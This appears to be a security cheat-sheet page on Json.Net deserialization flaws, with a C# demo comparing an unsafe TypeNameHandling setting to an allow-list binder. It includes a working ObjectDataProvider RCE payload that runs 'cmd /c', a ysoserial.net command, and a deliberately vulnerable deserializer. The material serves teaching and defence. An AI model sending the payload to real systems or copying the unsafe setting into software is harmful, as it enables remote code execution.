Json.Net Deserialization

Requires a custom TypeNameHandling setting chosen by the developer (Json.Net is not insecure by default: the default TypeNameHandling.None ignores the '$type' key). Any other value (Objects, Arrays, Auto, All) makes the deserializer resolve and instantiate the type named in '$type', unless a SerializationBinder restricts it to an allow-list. One of the following must be true for the type that is deserialized:

  • It is Object Type (java.lang.Object or System.Object)

  • It is a non-generic collection (e.g.: ArrayList, Hashtable, etc.)

  • It implements IDynamicMetaObjectProvider

  • It is System.Data.EntityKeyMember or any type derived from it. In this case the TypeNameHandling property may not even need to be set to a non-None value, because the EntityKeyMemberConverter resolves the type name on its own (see "TypeConverters").

Common RCE payload (can also be generated with ysoserial.net, e.g. ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "<payload>"). ObjectDataProvider invokes MethodName (here Process.Start) on ObjectInstance with MethodParameters as soon as those properties are set, so the command runs during deserialization. Fill in Version= with the assembly version of the target runtime (4.0.0.0 on .NET Framework 4.x):

    {
        '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
        'MethodName':'Start',
        'MethodParameters':{
            '$type':'System.Collections.ArrayList, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089',
            '$values':['cmd','/c <payload>']
        },
        'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
    }
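The following is an added example, not code from the original page or from Json.Net itself. It shows the developer-side setting that makes the payload above work (an object-typed member plus a non-None TypeNameHandling) next to a hardened variant that keeps polymorphism but resolves '$type' only against an allow-list via ISerializationBinder. The Ticket model, the JsonNetDemo class and the hostile JSON are constructed for the demo; it assumes the Newtonsoft.Json package (10.0 or later for ISerializationBinder).

```csharp
using System;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;

// Hypothetical model (not from the page). The System.Object member is the
// "Object Type" case from the list above: the '$type' key in the JSON
// decides which CLR class gets instantiated for it.
public class Ticket
{
    public string Title { get; set; }
    public object Payload { get; set; }
}

public static class JsonNetDemo
{
    // VULNERABLE: any TypeNameHandling other than None makes Json.Net resolve
    // and construct whatever type the attacker names in '$type'.
    public static Ticket DeserializeUnsafe(string json) =>
        JsonConvert.DeserializeObject<Ticket>(json, new JsonSerializerSettings
        {
            TypeNameHandling = TypeNameHandling.All
        });

    // HARDENED: if polymorphic members are really needed, keep TypeNameHandling
    // but bind '$type' only to an explicit allow-list. Anything else throws
    // before a constructor or property setter of the named type can run.
    private sealed class AllowListBinder : ISerializationBinder
    {
        private static readonly Type[] Allowed = { typeof(Ticket), typeof(string) };

        public Type BindToType(string assemblyName, string typeName)
        {
            foreach (var t in Allowed)
                if (t.FullName == typeName) return t;
            throw new JsonSerializationException("Type not allowed: " + typeName);
        }

        public void BindToName(Type serializedType, out string assemblyName, out string typeName)
        {
            assemblyName = null;
            typeName = serializedType.FullName;
        }
    }

    public static Ticket DeserializeSafe(string json) =>
        JsonConvert.DeserializeObject<Ticket>(json, new JsonSerializerSettings
        {
            TypeNameHandling = TypeNameHandling.Objects,
            SerializationBinder = new AllowListBinder()
        });

    public static void Main()
    {
        // Constructed input: the attacker names System.Diagnostics.Process for
        // the object-typed member. No ObjectDataProvider/MethodName here, so
        // nothing is executed; the point is that the type choice is theirs.
        const string hostile = @"{
            'Title': 'hello',
            'Payload': { '$type': 'System.Diagnostics.Process, System' }
        }";

        Ticket t = DeserializeUnsafe(hostile);
        Console.WriteLine(t.Payload.GetType().FullName);   // System.Diagnostics.Process

        try
        {
            DeserializeSafe(hostile);
        }
        catch (JsonSerializationException e)
        {
            // Json.Net wraps the binder's exception in its own "Error resolving type" message.
            Console.WriteLine("blocked: " + e.Message);
        }
    }
}
```

When reviewing code, grep for TypeNameHandling and SerializationBinder together: a non-None TypeNameHandling with no binder (or a binder that falls back to Type.GetType) on any endpoint that accepts client JSON is the condition the payload above needs, and TypeNameHandling.Auto is not safer than All for object-typed members on the deserialization side.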

ASP.NET Razor Template Injection (SSTI)

